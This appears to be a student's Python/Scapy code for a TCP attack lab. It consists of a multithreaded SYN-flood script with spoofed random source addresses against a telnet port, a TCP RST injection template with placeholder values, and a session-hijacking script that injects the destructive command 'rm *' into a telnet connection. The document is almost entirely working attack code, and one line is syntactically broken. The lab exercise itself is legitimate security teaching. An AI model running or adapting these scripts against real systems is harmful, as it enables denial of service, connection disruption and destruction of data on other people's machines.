






#!/usr/bin/python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
import random
import _thread

def attack():
    while True:
        a = IP(dst="10.9.0.5")
        b = TCP(dport=23, flags='S')
        pkt = a / b

        pkt['IP'].src = str(IPv4Address(random.getrandbits(32)))
        pkt[TCP].sport = random.getrandbits(16)
        pkt[TCP].seq = random.getrandbits(32)
        send(pkt, verbose=0)

for i in range(0, 100):
    _thread.start_new_thread(attack, ())

while True:
    pass


# Task 2.1 ----------------------------------------------------
# Launching the attack manually
#!/usr/bin/env python3
from scapy.all import *

ip = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=@@, dport=@@, flags="R", seq=@@@@)
pkt = ip/tcp
ls(pkt)
send(pkt, iface="eth0", verbose=0)



#!/usr/bin/env python3
from scapy.all import *
import sys
print("Sending Hijacking Packet/n") ip = IP(src="10.9.0.5", dst="10.9.0.6") 
tcp = TCP(sport=39676, dport=23, flags="A", seq=2537671292, ack=963565695)
data = '\r rm *\n\r'
pkt = ip/tcp/data
ls (pkt)
send(pkt, verbose=0)



